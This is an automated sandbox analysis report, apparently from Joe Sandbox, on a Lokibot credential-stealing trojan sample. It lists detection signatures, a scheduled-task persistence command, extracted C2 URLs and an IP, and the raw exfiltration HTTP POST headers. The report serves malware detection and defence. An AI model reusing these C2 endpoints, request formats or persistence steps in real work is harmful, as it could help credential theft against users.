Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 2CW1YLhNIS

Overview

General Information

Sample Name:2CW1YLhNIS (renamed file extension from none to exe)
Analysis ID:438541
MD5:76afce42f708e6a32dc9d0e52f9f0336
SHA1:d7a3d05c161bcfdafe6348d82672d011fc5b05cc
SHA256:9e658eb8027169730ef306e2e3b145dd71c9d9f569ce7dd7c8264a0dfc114d87
Tags:32exeLokitrojan
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Lokibot
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected aPLib compressed binary
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 2CW1YLhNIS.exe (PID: 5768 cmdline: 'C:\Users\user\Desktop\2CW1YLhNIS.exe' MD5: 76AFCE42F708E6A32DC9D0E52F9F0336)
    • schtasks.exe (PID: 2872 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UieOsrSocP' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D57.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 2212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • 2CW1YLhNIS.exe (PID: 6172 cmdline: C:\Users\user\Desktop\2CW1YLhNIS.exe MD5: 76AFCE42F708E6A32DC9D0E52F9F0336)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://63.141.228.141/32.php/QQojJUjm8ByeT"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
          00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
          • 0x1727b:$des3: 68 03 66 00 00
          • 0x1b678:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
          • 0x1b744:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
          Click to see the 15 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
          • 0x13e78:$s1: http://
          • 0x17633:$s1: http://
          • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
          • 0x13e80:$s2: https://
          • 0x13e78:$f1: http://
          • 0x17633:$f1: http://
          • 0x13e80:$f2: https://
          0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpackLoki_1Loki Payloadkevoreilly
                • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
                • 0x13ffc:$a2: last_compatible_version
                Click to see the 15 entries

                Sigma Overview

                No Sigma rule has matched

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Antivirus / Scanner detection for submitted sampleShow sources
                Source: 2CW1YLhNIS.exeAvira: detected
                Antivirus detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Roaming\UieOsrSocP.exeAvira: detection malicious, Label: HEUR/AGEN.1142734
                Found malware configurationShow sources
                Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://63.141.228.141/32.php/QQojJUjm8ByeT"]}
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Roaming\UieOsrSocP.exeReversingLabs: Detection: 26%
                Multi AV Scanner detection for submitted fileShow sources
                Source: 2CW1YLhNIS.exeReversingLabs: Detection: 26%
                Source: 2CW1YLhNIS.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                Source: 2CW1YLhNIS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,4_2_00403D74
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_05FAC8A8
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_05FAC898

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49735 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49735 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49735 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49735 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49737 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49737 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49737 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49737 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49739 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49739 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49739 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49739 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49741 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49741 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49741 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49741 -> 63.141.228.141:80
                C2 URLs / IPs found in malware configurationShow sources
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Malware configuration extractorURLs: http://63.141.228.141/32.php/QQojJUjm8ByeT
                Source: Joe Sandbox ViewIP Address: 63.141.228.141 63.141.228.141
                Source: Joe Sandbox ViewASN Name: NOCIXUS NOCIXUS
                Source: global trafficHTTP traffic detected: POST /32.php/QQojJUjm8ByeT HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C18574AAContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /32.php/QQojJUjm8ByeT HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C18574AAContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /32.php/QQojJUjm8ByeT HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C18574AAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /32.php/QQojJUjm8ByeT HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C18574AAContent-Length: 163Connection: close
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_00404ED4 recv,4_2_00404ED4
                Source: unknownHTTP traffic detected: POST /32.php/QQojJUjm8ByeT HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C18574AAContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Jun 2021 16:23:10 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 2
                Source: 2CW1YLhNIS.exe, 00000004.00000002.660280673.000000000049F000.00000040.00000001.sdmpString found in binary or memory: http://63.141.228.141/32.php/QQojJUjm8ByeT
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649270975.0000000002D11000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: 2CW1YLhNIS.exe, 2CW1YLhNIS.exe, 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
                Source: 2CW1YLhNIS.exe, 00000000.00000002.648771695.0000000001100000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                System Summary:

                barindex
                Malicious sample detected (through community Yara rule)Show sources
                Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.650407522.0000000003D19000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 4.2.2CW1YLhNIS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 4.2.2CW1YLhNIS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 4.2.2CW1YLhNIS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 4.2.2CW1YLhNIS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_008F5EC60_2_008F5EC6
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_008F21B80_2_008F21B8
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_008F4B400_2_008F4B40
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_02B7F6400_2_02B7F640
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_02B7F9520_2_02B7F952
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_02B7F6E10_2_02B7F6E1
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_02B798900_2_02B79890
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_0534ED2E0_2_0534ED2E
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_053468A40_2_053468A4
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_0534E8F00_2_0534E8F0
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_0534A2100_2_0534A210
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_0534E8E00_2_0534E8E0
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FAD4E00_2_05FAD4E0
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FAA4B50_2_05FAA4B5
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FAA4500_2_05FAA450
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA86080_2_05FA8608
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA93C00_2_05FA93C0
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FAA2380_2_05FAA238
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA8D200_2_05FA8D20
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA1E100_2_05FA1E10
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FABA910_2_05FABA91
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA85F80_2_05FA85F8
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA05700_2_05FA0570
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA05610_2_05FA0561
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA17B80_2_05FA17B8
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA17A80_2_05FA17A8
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA97500_2_05FA9750
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA97400_2_05FA9740
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA46680_2_05FA4668
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA465A0_2_05FA465A
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA41800_2_05FA4180
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA41720_2_05FA4172
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA93B10_2_05FA93B1
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA32A80_2_05FA32A8
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA326D0_2_05FA326D
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA32370_2_05FA3237
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FAA2280_2_05FAA228
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA8D0F0_2_05FA8D0F
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA1C300_2_05FA1C30
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA1C200_2_05FA1C20
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA9E600_2_05FA9E60
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA9E510_2_05FA9E51
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA1E010_2_05FA1E01
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA19D80_2_05FA19D8
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA19C80_2_05FA19C8
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA38E00_2_05FA38E0
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA38980_2_05FA3898
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_0040549C4_2_0040549C
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_004029D44_2_004029D4
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_00C921B84_2_00C921B8
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_00C95EC64_2_00C95EC6
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_00C94B404_2_00C94B40
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: String function: 00405B6F appears 42 times
                Source: 2CW1YLhNIS.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: UieOsrSocP.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: 2CW1YLhNIS.exe, 00000000.00000002.648771695.0000000001100000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 2CW1YLhNIS.exe
                Source: 2CW1YLhNIS.exe, 00000000.00000002.655077709.000000000BE80000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs 2CW1YLhNIS.exe
                Source: 2CW1YLhNIS.exe, 00000000.00000002.648342673.0000000000A0C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSearchData.exe< vs 2CW1YLhNIS.exe
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649406564.0000000002DEF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRelativeFileUrl.dllL vs 2CW1YLhNIS.exe
                Source: 2CW1YLhNIS.exe, 00000000.00000002.654647019.00000000061C0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSparselyPopulated.dll@ vs 2CW1YLhNIS.exe
                Source: 2CW1YLhNIS.exe, 00000000.00000002.655249744.000000000BF80000.00000002.00000001.sdmpBinary or memory string: originalfilename vs 2CW1YLhNIS.exe
                Source: 2CW1YLhNIS.exe, 00000000.00000002.655249744.000000000BF80000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs 2CW1YLhNIS.exe
                Source: 2CW1YLhNIS.exe, 00000004.00000000.647583868.0000000000DAC000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSearchData.exe< vs 2CW1YLhNIS.exe
                Source: 2CW1YLhNIS.exeBinary or memory string: OriginalFilenameSearchData.exe< vs 2CW1YLhNIS.exe
                Source: 2CW1YLhNIS.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
